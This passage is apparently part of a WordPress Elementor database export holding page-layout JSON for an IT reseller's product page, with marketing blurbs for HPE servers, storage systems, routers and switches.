id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02284db\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"209c77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"465decc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9df2da5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745e40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d0111a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>HPE Synergy<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Composable, software-defined infrastructure that speeds application delivery.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e25b4f6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e344f90\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"e99ae7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy 12000 Frame<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2515\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-12000-Frame.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"170\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"62e0e2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"40915d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy D3940 Storage Module<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2516\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-D3940-Storage-Module.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"70339e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a96ca1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c8c89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da0887c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c273b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"296570e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d7056bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"34066b9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f501a1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bb27a6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2cf5757\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Data Storage<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"efbecc6\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"243cf87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"c45d541\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c301724\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c16a918\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af04195\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b45681b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ffd0fc\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75f50e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"cb4169e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"067e237\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"3849c5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f98d0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"8d4989d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11168cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f816ee3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cef774\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85f9784\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea7fd08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb3eeba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>NETWORKING<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"021e064\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3645aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"d34cd1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Router<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"304f150\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c7392b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"687ac33\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FLexNetwork MSR95x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2520\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FLexNetwork-MSR95x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"227\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e505229\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"65af13d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Alcatel-Lucent 7750 Service Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2521\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Alcatel-Lucent-7750-Service-Router-Series.png\\\" alt=\\\"\\\" width=\\\"229\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb\\/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f17738e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"6eb923f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FlexNetwork MSR93x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2522\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FlexNetwork-MSR93x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"188\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE\\/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4335c67\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"964afb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f168dc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"479f0a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4f95a1f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3f5f006\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fed6471\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4419ab2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"145a6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5715260\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aeec70b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50f2e58\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"99ae68c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Switches<\\/strong><\\/h2>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"823bc65\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f135ea8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f3e7bd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2523\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"165\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot\\/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2d0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"9dd34f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2524\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\\\" alt=\\\"\\\" width=\\\"244\\\" height=\\\"184\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100\\/50\\/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100\\/50GbE spine switches. It is optimized for data center hot\\/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5490442\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fae7b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4c6953\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7341cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af59a7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ac4e02\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fa822d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"9\",\"right\":\"9\",\"bottom\":\"9\",\"left\":\"9\",\"isLinked\":true}},\"elements\":[{\"id\":\"608d110\",\"elType\":\"widget\",\"settings\":{\"editor\":\"&nbsp;\\n&nbsp;\\n<p style=\\\"text-align: center;\\\">To discover more, please click the button below or contact us to discuss your needs.<\\/p>\\n<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8374,3629,'_elementor_template_type','post'),(8375,3629,'_elementor_version','2.5.14'),(8376,3629,'_elementor_data','[{\"id\":\"e3617cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"43a7986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2911cf1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SERVER AND SYSTEM<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5d09ee\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea019d6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"50f056f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Rack Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.<\\/p>\",\"_border_border\":\"solid\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ba1eaa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"736e3d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"bf473fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL325 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2509 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL325-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Secure and versatile single socket (1P) 1U AMD EPYC\\u2122 based platform offers an exceptional balance of processor, memory and I\\/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba9d094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f64c755\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL385 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2511 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL385-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e4020c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4e09160\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 